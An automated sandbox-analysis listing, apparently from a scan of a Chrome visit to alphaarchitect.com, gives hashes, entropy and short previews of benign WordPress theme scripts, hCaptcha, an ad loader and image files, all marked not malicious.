                                                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                                                        Entropy (8bit):4.7343680987778
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:zAMkzPnUQgCLN1zC9L7SLPwu7FIPwVVMPHremr:zAMkzPUQL51zC9yLPwu7FIPwoPHT
                                                                                                                                                                                                                                                                        MD5:E942CC3B1830784E20D1D7C755AE2E7B
                                                                                                                                                                                                                                                                        SHA1:300C1289A0935FD109FB2C808CFB7C681EE17FC6
                                                                                                                                                                                                                                                                        SHA-256:1BD2FDA3048CDC37D2902EB58932FAEF913A0FBC83E267BDB50DDE9426388786
                                                                                                                                                                                                                                                                        SHA-512:12D8EC817205666FE744DF88C1795D303EF177DE418E602C4EA133ECD74A2E5596E50B2B4765C656029862D8A5142B34E130FF237F5FE2A82073F2000B37E29D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function(){jQuery(".fusion-footer .fusion-footer-widget-area .fusion-column").each(function(){jQuery(this).is(":empty")&&jQuery(this).css("margin-bottom","0")}),jQuery(".fusion-social-links-footer").find(".fusion-social-networks").children().length||(jQuery(".fusion-social-links-footer").hide(),jQuery(".fusion-footer-copyright-area .fusion-copyright-notice").css("padding-bottom","0"))})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (412), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                                                        Entropy (8bit):4.7343680987778
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:zAMkzPnUQgCLN1zC9L7SLPwu7FIPwVVMPHremr:zAMkzPUQL51zC9yLPwu7FIPwoPHT
                                                                                                                                                                                                                                                                        MD5:E942CC3B1830784E20D1D7C755AE2E7B
                                                                                                                                                                                                                                                                        SHA1:300C1289A0935FD109FB2C808CFB7C681EE17FC6
                                                                                                                                                                                                                                                                        SHA-256:1BD2FDA3048CDC37D2902EB58932FAEF913A0FBC83E267BDB50DDE9426388786
                                                                                                                                                                                                                                                                        SHA-512:12D8EC817205666FE744DF88C1795D303EF177DE418E602C4EA133ECD74A2E5596E50B2B4765C656029862D8A5142B34E130FF237F5FE2A82073F2000B37E29D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-general-footer.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function(){jQuery(".fusion-footer .fusion-footer-widget-area .fusion-column").each(function(){jQuery(this).is(":empty")&&jQuery(this).css("margin-bottom","0")}),jQuery(".fusion-social-links-footer").find(".fusion-social-networks").children().length||(jQuery(".fusion-social-links-footer").hide(),jQuery(".fusion-footer-copyright-area .fusion-copyright-notice").css("padding-bottom","0"))})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6622), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):6622
                                                                                                                                                                                                                                                                        Entropy (8bit):5.142944161353103
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8ilXxPl9IB4L/fd3PwAeIldhkgnqRqlfGrq9YI1u0+bRo9KhRpL2YCPM3QSaYG9t:8il2Q/f5Ze6XfCuP1um2b6YCPGaY6Zp
                                                                                                                                                                                                                                                                        MD5:8773E8F41220C9161EFB552033B74E87
                                                                                                                                                                                                                                                                        SHA1:F547AEB502B891985D484D977255754AAB7776BD
                                                                                                                                                                                                                                                                        SHA-256:1DCF137E7E60F08D5FD0A03F2EDDEBE0323A00EB682989C9B6DE248C9B0884B3
                                                                                                                                                                                                                                                                        SHA-512:7EE3E07868AA6F44A21C40475FE9D8C0BBA47E664EA3834A7B5BFCCAE1ADBCDBCDEC7285D8E9BD1309C9A1DE9325E99AA19E9FF6BBA52525901949B8775893CF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-scroll-to-anchor.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function awbScrollToTarget(e,t){var n,o,s,i,a,r,l,u,c,h,f,d,p=jQuery("html").hasClass("ua-edge")||jQuery("html").hasClass("ua-safari-12")||jQuery("html").hasClass("ua-safari-11")||jQuery("html").hasClass("ua-safari-10")?"body":"html",g=jQuery(".fusion-tb-header").length,y=!1,m=!1;if(t=void 0!==t?t:0,e.length){if(e.parents(".fusion-scroll-section").hasClass("awb-swiper-full-sections"))return;if((e.parents(".hundred-percent-height-scrolling").length||e.find(".hundred-percent-height-scrolling").length)&&(0!=fusionScrollToAnchorVars.container_hundred_percent_height_mobile||!Modernizr.mq("only screen and (max-width: "+fusionScrollToAnchorVars.content_break_point+"px)"))){if((d=e.hasClass("fusion-scroll-section-element")?e:e.parents(".fusion-scroll-section-element")).hasClass("active")&&d.offset().top>=jQuery(window).scrollTop()&&d.offset().top<jQuery(window).scrollTop()+jQuery(window).height())return!1;if(location.hash&&"#_"===location.hash.substring(0,2)&&jQuery(".fusion-page-load-link").a
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (41625)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):150639
                                                                                                                                                                                                                                                                        Entropy (8bit):5.404735182175262
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:AwlL47MnAPaiA2UudRCe/fX2MkdF5kpjmgL1ZVplqpU:AwlgMgaiA2UuZ/P2MkdF5WL1/plqpU
                                                                                                                                                                                                                                                                        MD5:B20559412B1D0DC2412931B628AA8163
                                                                                                                                                                                                                                                                        SHA1:6EEE080D6EE3D588BC608CDA70D1B10CE75AA120
                                                                                                                                                                                                                                                                        SHA-256:35E9BDBAC24332F0DFEDB88D94AC1354C59B1B939A2FCA39991796517FCB74B1
                                                                                                                                                                                                                                                                        SHA-512:6BC184C8A14988D970A19994D4C1FCB83D191014DA2174E897CD85E27F53B9E513CF858D0B48264F6A7BA867D5112E240232CF14445CDB47CADE34B6DD7A3AD1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/* https://hcaptcha.com/license */.!function(){"use strict";function e(e){var t=this.constructor;return this.then((function(n){return t.resolve(e()).then((function(){return n}))}),(function(n){return t.resolve(e()).then((function(){return t.reject(n)}))}))}function t(e){return new this((function(t,n){if(!e||"undefined"==typeof e.length)return n(new TypeError(typeof e+" "+e+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(e);if(0===r.length)return t([]);var i=r.length;function o(e,n){if(n&&("object"==typeof n||"function"==typeof n)){var a=n.then;if("function"==typeof a)return void a.call(n,(function(t){o(e,t)}),(function(n){r[e]={status:"rejected",reason:n},0==--i&&t(r)}))}r[e]={status:"fulfilled",value:n},0==--i&&t(r)}for(var a=0;a<r.length;a++)o(a,r[a])}))}var n=setTimeout,r="undefined"!=typeof setImmediate?setImmediate:null;function i(e){return Boolean(e&&"undefined"!=typeof e.length)}function o(){}function a(e){if(!(this instanceof
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1016), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1016
                                                                                                                                                                                                                                                                        Entropy (8bit):5.101106804661301
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:6UP0VMVi9pi2VimXAMkuanjykPs7KqORoyiT4/TLzXpvquHsPNmTPzDszvrd/:EqU5YMAm5VTT47vxi1
                                                                                                                                                                                                                                                                        MD5:376AFF03C7A0C7EEB2AF259CE6BAA321
                                                                                                                                                                                                                                                                        SHA1:872E48E47B3088E2F25184A99EE5FD94B545F7F7
                                                                                                                                                                                                                                                                        SHA-256:ECFEAAA265FB6A8F4C9500103F18E092C119F934539A6C9E56A6F42A098E5E30
                                                                                                                                                                                                                                                                        SHA-512:974E1A65B3439218F70C7C12F875D9DF032EE99B4D5C10BD222000437A519B6CC96D99E6D0B46002AC261FC48AB2FF012CC388195BAC959DF051B5F4BBFD4A01
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-to-top.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function avadaUpdateToTopPostion(){var o=avadaToTopVars.totop_position.split("_");o=2===o.length?"to-top-"+o[0]+" to-top-"+o[1]:"to-top-"+o[0],jQuery(".to-top-container").attr("class","to-top-container"),jQuery(".to-top-container").addClass(o)}jQuery(document).ready(function(){var o=0,a=jQuery("html").hasClass("ua-edge")||jQuery("html").hasClass("ua-safari-12")||jQuery("html").hasClass("ua-safari-11")||jQuery("html").hasClass("ua-safari-10")?"body":"html";jQuery(".fusion-top-top-link").on("click",function(o){o.preventDefault(),(cssua.ua.mobile&&-1!==avadaToTopVars.status_totop.indexOf("mobile")||!cssua.ua.mobile)&&jQuery(a).animate({scrollTop:0},1200,"easeInOutExpo")}),jQuery(window).on("scroll",function(){var a=jQuery(this).scrollTop();200<a&&(a>=o||1!==parseInt(avadaToTopVars.totop_scroll_down_only))?jQuery(".fusion-top-top-link").addClass("fusion-to-top-active"):jQuery(".fusion-top-top-link").removeClass("fusion-to-top-active"),o=a}),jQuery(window).on("updateToTopPostion",avadaUpdat
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2807)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4734
                                                                                                                                                                                                                                                                        Entropy (8bit):5.363876004976874
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:PKZwGpwPCyDFZ5a8im39aR0fzhmXjmzP+iZ+i3oxnTL+p:PQwGNyBZ5adgbhKjuPVLoxnTap
                                                                                                                                                                                                                                                                        MD5:196FA45E05519C83350485FE44677BC5
                                                                                                                                                                                                                                                                        SHA1:F38D56C7EB7F201CBA701E61E5B46DD6BC7305FC
                                                                                                                                                                                                                                                                        SHA-256:4E630391137ED30D50B5D465FD155A82FDE11253A17F6F1693AD55EF902724DA
                                                                                                                                                                                                                                                                        SHA-512:50BAD29A535DA5C5D4F8BE1BDA158257CF65A3C71A95D881BB030AC6670DED5672D8F888397F0F54D8F822A1A2D35EFFBC2ECC67BD058873D9EA165500D2583A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:(function(){var a;a='c=2645100a8c95db0&host=a.clickcertain.com&wld=x.clickcertain.com&ccid=355cc50d-f67c-485f-9153-f0a0ddff6935&geo=US&rid=5145d06c-5f4f-4725-b5d2-56c6db855af1';(function(){var b,c,d,e,f,g,h,i,j,k,l,m,n;k=function(a){var b,c,d,e;b=[];for(c=d=0,e=a;0<=e?d<e:d>e;c=0<=e?++d:--d)b.push(c);return b;};i=function(a){var b,c,d,e,f;b=a.split("&");f={};for(c=0,d=b.length;c<d;c++){e=b[c];e=e.split("=");f[e[0]]=e[1];}return f;};g=function(a){var b,c,d,e,f,g;d=a[0];b=a[1];g=k(d.length);for(e=0,f=d.length;e<f;e++){c=d[e];g[d[c]]=b[c];}return g.join('');};h=function(){var b,c;b="x.clickcertain.com";c=i(a).wld;if(c!=null)return c;return b;};l=function(a){var b,c,d,e;d='adnxs';b=['secure'];b.push(d);e='com';b.push(e);if('https:'===document.location.protocol){if(a.indexOf("https")===-1)a=a.replace("http://","https://");c=h();if(a.indexOf(c)>-1)a=a.replace(c,b.join('.'));}return a;};e=function(a){var c;a=b.decode(a);c=typeof JSON!=="undefined"&&JSON!==null?JSON.parse(a):void 0;if(c==null)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2935)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):39974
                                                                                                                                                                                                                                                                        Entropy (8bit):5.309284464632211
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:iM2ueHru9BC39N3uCgopOO5opv6jdUtwHsyxJenCaLDt4yOcHAAyLprzekFK7Q/z:iEC391jqtwHsyxJenCaLx4RAyLprzeYZ
                                                                                                                                                                                                                                                                        MD5:F330CB00791D3D3D8196704F0E399EA1
                                                                                                                                                                                                                                                                        SHA1:CA48E93FB169ABEBE5B3242644F040A5798B193B
                                                                                                                                                                                                                                                                        SHA-256:0356FED73F077A7C1EC2A2B0AABA2330F07FBABFEE03DA2A6240A88843604322
                                                                                                                                                                                                                                                                        SHA-512:F00D5BD6069D81041645BCAF3A8C9C3B52BC37A4E54C2A32DD7EB34B825706B2D45EA9BD0DE06EA3714C7883B1A99BBCEC5D8FE0F6CAD0B9E8860566C7F1106D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:var commonUtils={hasClass:function(node,className){if(node.nodeType!==Node.ELEMENT_NODE){return!1}.if(node.classList){return node.classList.contains(className)}.var classNames=(node.getAttribute('class')||'').split(/\s/);return classNames.indexOf(className)>=0},addClassTo:function(node,className){if(node.nodeType!==Node.ELEMENT_NODE){return}.if(!commonUtils.hasClass(node,className)){if(node.classList){node.classList.add(className)}else{node.className=(node.className||'')+' '+className}}},removeClassFrom:function(node,className){if(node.nodeType!==Node.ELEMENT_NODE){return}.if(commonUtils.hasClass(node,className)){if(node.classList){node.classList.remove(className)}else{var classNames=(node.getAttribute('class')||'').split(' ');var index=classNames.indexOf(className);if(index>=0){classNames.splice(index,1)}.node.setAttribute('class',classNames.join(' '))}}},getImageWidth:function(img,onServer){if(img.jquery){img=img[0]}.var result=null;if(onServer){var pfDataWidth=img.getAttribute('pf-d
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9103), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):9103
                                                                                                                                                                                                                                                                        Entropy (8bit):5.039082961498355
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:nbHbKVlJV2mxtGp8r5RBQ2qaDGsUH5LQ+8Mw:nbHWDJjWeiS6/w
                                                                                                                                                                                                                                                                        MD5:59F75AA49162A9CBD234C1C445BB92E5
                                                                                                                                                                                                                                                                        SHA1:92337C52D8F18153DBB728FB1C7C6E4BAF99DE11
                                                                                                                                                                                                                                                                        SHA-256:0B38470A40052C9BA91360E670A9F423FBB9E3FF9944F7B39FDD74B489562669
                                                                                                                                                                                                                                                                        SHA-512:B1B70018CDCBB07E8F2E4C281FA0FC747BBC014B40D8C30FC142B006AA1116FF822FF49AD19C1E5C304A7F62F9F76D3791166BF2EC6EF39D82510552829AD935
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/raty/um-raty.min.js?ver=2.6.0
                                                                                                                                                                                                                                                                        Preview:!function(i){var r={init:function(t){return this.each(function(){this.self=i(this),r.destroy.call(this.self),this.opt=i.extend(!0,{},i.fn.um_raty.defaults,t),r._adjustCallback.call(this),r._adjustNumber.call(this),"img"!==this.opt.starType&&r._adjustStarType.call(this),r._adjustPath.call(this),r._createStars.call(this),this.opt.cancel&&r._createCancel.call(this),this.opt.precision&&r._adjustPrecision.call(this),r._createScore.call(this),r._apply.call(this,this.opt.score),r._target.call(this,this.opt.score),(this.opt.readOnly?r._lock:(this.style.cursor="pointer",r._binds)).call(this),this.self.data("options",this.opt)})},_adjustCallback:function(){for(var t=["number","readOnly","score","scoreName","target"],e=0;e<t.length;e++)"function"==typeof this.opt[t[e]]&&(this.opt[t[e]]=this.opt[t[e]].call(this))},_adjustNumber:function(){this.opt.number=r._between(this.opt.number,1,this.opt.numberMax)},_adjustPath:function(){this.opt.path=this.opt.path||"",this.opt.path&&"/"!==this.opt.path.charA
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 124 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1597
                                                                                                                                                                                                                                                                        Entropy (8bit):7.788121770576295
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:VpXVDH5ysGvBvHMO3TDp4pQ8qjQAO9Z2TS1:t5DGtTTDOqjQAO9gTS1
                                                                                                                                                                                                                                                                        MD5:4FA09B16D257EF2D09FFBAFC25A2049C
                                                                                                                                                                                                                                                                        SHA1:BABDBAFF41F160D56CE8EF5B79D20654EADFBD43
                                                                                                                                                                                                                                                                        SHA-256:842928E0C616F011DB3EBB36D37F783EA81B3BD44D7EDCBBCCDD3A394E6676D2
                                                                                                                                                                                                                                                                        SHA-512:636B2ADDAB0601F89E7D893D7F1315477D22D60E618EC22744D5A63C88A02147CD55D4C476333AEB14EC22002A7A764E9CD376972B3C87753BFDEF161DCF067A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR...|.........."z.....gAMA......a.....IDATh..XkL\E.....[@.P.6KK.B..E........F.m...CLX@"..b#..URkcjS.6.M..C...bRi....?..6....>..Kfo.^...X..d.3g.9s.....B..D.D.D.D.D.D.D.D..>..Q.wz.R.&o.E....dS(D.j6{..0......9...2....#....s...ve.......u7K.b..!#.$.n$.yK.#.$U..Yny.x.....]y.....%Cv.W..F3.....]2q.[...e...s+:uy...v.+;.d.....>._.I^...#m...............+............[.}........!2.~..o..._.J.}.d...J.dh.n....P...u...K.;.z.d2..Z....If....._c.m........s....r......2.UD.eMy...;..p.,;.b....Mb.]....1...g.'vV.~..w..............|L...&5.R.AB.f.`m.....{:.....}.mS8...@O..4V...v+t.RSS.c..h.+.......,...q......z.....LH.~...Z.O,....".ybge`.4b..U.B.SN.s+]...9T..DnhUx...._./.2&.<.v....b.;q;.kiiY3:::.^....C...*.1.i.K......~L....5P.#./`.....^.h.........2r....Tx....Z.7.~.L...%.....d..!...E.3q..Dw..O+vl..TL..v[.^....h....188HE.d....-.u..j....`DjS.cy...>.w.AnD...... ........>.:.).....F..|>z.n.M@........1~.|..S.......k.O..@U>...^.;te.c6........._C.Y...f......k.....#....
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3343), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3343
                                                                                                                                                                                                                                                                        Entropy (8bit):5.354906641664406
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:aZIZuGCM6Ha+SD8+6j6PnsjfPKR0dQZz+:FuxAI++jfPG0eZa
                                                                                                                                                                                                                                                                        MD5:4E7130FECFF5C88D82919909BA4498B6
                                                                                                                                                                                                                                                                        SHA1:B0532F64107DFEF00BD7FAEB8CB62F56F64D8AF9
                                                                                                                                                                                                                                                                        SHA-256:A61FC82DA418B32E03ABD77073AD48397CD70B5669527B0938F95CE277B948A0
                                                                                                                                                                                                                                                                        SHA-512:EE1F6C352520A5CE92406DB017A237B1260189396C1AE8B47B1E8185638998B84078449350DE9CC6162C0892B77164D95E2E379D378AD36477995B14F9EB70CE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:var cssua=function(e,o,i){"use strict";var s=" ua-",r=/\s*([\-\w ]+)[\s\/\:]([\d_]+\b(?:[\-\._\/]\w+)*)/,n=/([\w\-\.]+[\s\/][v]?[\d_]+\b(?:[\-\._\/]\w+)*)/g,a=/\b(?:(blackberry\w*|bb10)|(rim tablet os))(?:\/(\d+\.\d+(?:\.\w+)*))?/,b=/\bsilk-accelerated=true\b/,t=/\bfluidapp\b/,l=/(\bwindows\b|\bmacintosh\b|\blinux\b|\bunix\b)/,p=/(\bandroid\b|\bipad\b|\bipod\b|\bwindows phone\b|\bwpdesktop\b|\bxblwp7\b|\bzunewp7\b|\bwindows ce\b|\bblackberry\w*|\bbb10\b|\brim tablet os\b|\bmeego|\bwebos\b|\bpalm|\bsymbian|\bj2me\b|\bdocomo\b|\bpda\b|\bchtml\b|\bmidp\b|\bcldc\b|\w*?mobile\w*?|\w*?phone\w*?)/,c=/(\bxbox\b|\bplaystation\b|\bnintendo\s+\w+)/,d={parse:function(e,o){var i={};if(o&&(i.standalone=o),!(e=(""+e).toLowerCase()))return i;for(var s,d,m=e.split(/[()]/),w=0,_=m.length;w<_;w++)if(w%2){var u=m[w].split(";");for(s=0,d=u.length;s<d;s++)if(r.exec(u[s])){var f=RegExp.$1.split(" ").join("_"),v=RegExp.$2;(!i[f]||parseFloat(i[f])<parseFloat(v))&&(i[f]=v)}}else{var x=m[w].match(n);if(x)for(s=0
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):203
                                                                                                                                                                                                                                                                        Entropy (8bit):5.139523437629011
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:pn0+t9xqObRKr6TQzetSzRx3G0CezowoG:J0+t9xqeRKWTQzetSzRxGezn
                                                                                                                                                                                                                                                                        MD5:A368EBDB8002FBB3142E16BC34B326D8
                                                                                                                                                                                                                                                                        SHA1:E727C702FB6BE3CBEFA0B0847717B2334CE9B8FD
                                                                                                                                                                                                                                                                        SHA-256:7BB4BE9184710E7D3067CE155A3F8E37C248BDF649906EA40AF66A324ACE61A4
                                                                                                                                                                                                                                                                        SHA-512:2550B4B0040F566D106E24E8180DE41225FEDA5B82C68A31BC7DBCF422B6751CC1701CD3F1CC51A7FFDBD57FDCDCCABF1F3B6444AFDA681221F8E6F734C40DAD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html><head>..<title>404 Not Found</title>..</head><body>..<h1>Not Found</h1>..<p>The requested URL was not found on this server.</p>..</body></html>..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (19515), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):19515
                                                                                                                                                                                                                                                                        Entropy (8bit):5.093588280605114
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:Z0x0cFcl+6rQHDFpcFIYnQM6cpajeUzQ+qH+HWzVL416b3pt:Z0x0cFclZrQHDEFIYnQspIrQB+HWzVsc
                                                                                                                                                                                                                                                                        MD5:414CE02C794992C66159D9EC0458C92D
                                                                                                                                                                                                                                                                        SHA1:BC726B7413FFA9F8079A8837B4C157EB32764A27
                                                                                                                                                                                                                                                                        SHA-256:40E42DEA1E0688E6F0A7C05006F95031D21B82B1C602F2E5BD6CFABE5787FB0A
                                                                                                                                                                                                                                                                        SHA-512:FC36F2289455117081D015F06963B31E97640CCDBC922BC961C9F6488514034A450EFF1B0F6A14016929114483D5008C5C442273F78ABF18BEF160AD4BADCA5D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function fusionInitStickyContainers(){"function"==typeof jQuery.fn.stick_in_parent&&jQuery(".fusion-sticky-container").each(function(){fusionInitSticky(jQuery(this))})}function fusionInitSticky(e){var t=void 0===e.attr("data-transition-offset")?0:parseFloat(e.attr("data-transition-offset")),i=void 0===e.attr("data-sticky-offset")?0:e.attr("data-sticky-offset"),n=void 0!==e.attr("data-scroll-offset")&&parseFloat(e.attr("data-scroll-offset")),o={sticky_class:"fusion-container-stuck",bottoming:!0,offset_top:i,transition_offset:t,clone:!1},s="data-sticky-medium-visibility";jQuery("body").hasClass("fusion-disable-sticky")?e.data("sticky_kit")&&e.trigger("sticky_kit:detach"):"object"!=typeof fusion||"function"!=typeof fusion.isLarge||(fusion.isLarge()?s="data-sticky-large-visibility":fusion.isSmall()&&(s="data-sticky-small-visibility"),void 0!==e.attr(s)&&e.attr(s))?e.data("sticky_kit")||(n&&(o.scroll_transition=n),e.closest(".fusion-tb-header").length||e.closest(".fusion-tb-page-title-bar")
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7237), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):7237
                                                                                                                                                                                                                                                                        Entropy (8bit):5.262940477428554
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:kx1pvABOi26Pf9ZWrjW8EDRg+NfJPcglNJ/py:81pv0OidIrjW8EDRg+NfJEmHpy
                                                                                                                                                                                                                                                                        MD5:682B2C929AC216F0C7536A27A446631E
                                                                                                                                                                                                                                                                        SHA1:2CFADFCBDC559D8E32ABB2FE4DFB3FDFC2351A83
                                                                                                                                                                                                                                                                        SHA-256:7C8E0DFA6A9519EE45740B330731CD145F62EE2B2D6F9C9B5AA618457ADD25CD
                                                                                                                                                                                                                                                                        SHA-512:94181B3759D47148C5E45D59861AB90A69EADB62C0FD24156F6E13B90D70BCCCCAF32244A2AC43BB869BDFFFF512A6B9D1CCB378F73B9E71C3CAB4700926F9AE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-lightbox.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function avadaLightBoxInitializeLightbox(){window.$ilInstances&&jQuery.each(window.$ilInstances,function(t,i){window.$ilInstances[t].destroy()}),window.avadaLightBox.initialize_lightbox()}window.avadaLightBox={},void 0===window.$ilInstances&&(window.$ilInstances={}),window.avadaLightBox.initialize_lightbox=function(){"use strict";1===Number(fusionLightboxVars.status_lightbox)&&(window.avadaLightBox.set_title_and_caption(),window.avadaLightBox.activate_lightbox())},window.avadaLightBox.activate_lightbox=function(t){"use strict";var i,e=[],o=1;void 0===t&&(t=jQuery("body")),t.find('[data-rel^="prettyPhoto["], [rel^="prettyPhoto["], [data-rel^="iLightbox["], [rel^="iLightbox["]').each(function(){var t,i,o,a,n=["bmp","gif","jpeg","jpg","png","tiff","tif","jfif","jpe","svg","mp4","ogg","webm","webp"],r=0,s=jQuery(this).attr("href");for(void 0===s&&(s=""),t=0;t<n.length;t++)r+=String(s).toLowerCase().indexOf("."+n[t]);i=/http(s?):\/\/(www\.)?vimeo.com\/(\d+)/,s.match(i)&&(r=1),i=/^.*((youtu.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6100), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6100
                                                                                                                                                                                                                                                                        Entropy (8bit):5.18239087347017
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:pdSqkXEdsugVqyKuwwSyLrOeCbp7qDqwhSqLqnnG26slpAQ:p0a+ugVbxfprOjAwC1WpAQ
                                                                                                                                                                                                                                                                        MD5:E2D16CDD96D3056B2883422F8C8A5993
                                                                                                                                                                                                                                                                        SHA1:B5160251A1C9AF658C4F05CE30868A0B63639389
                                                                                                                                                                                                                                                                        SHA-256:B44C32B17E2418C99F9B16AE18F11A480ABDCBAE20290842EAD2648272A892A1
                                                                                                                                                                                                                                                                        SHA-512:140A8C894CEEBFE40D95014B71E6565967C6F1D70AF7B10D8371F345BC805575D58C199EFA4FD072B842B5824C769EB47B6688538D2A102ACE8F64D91DB41B7A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
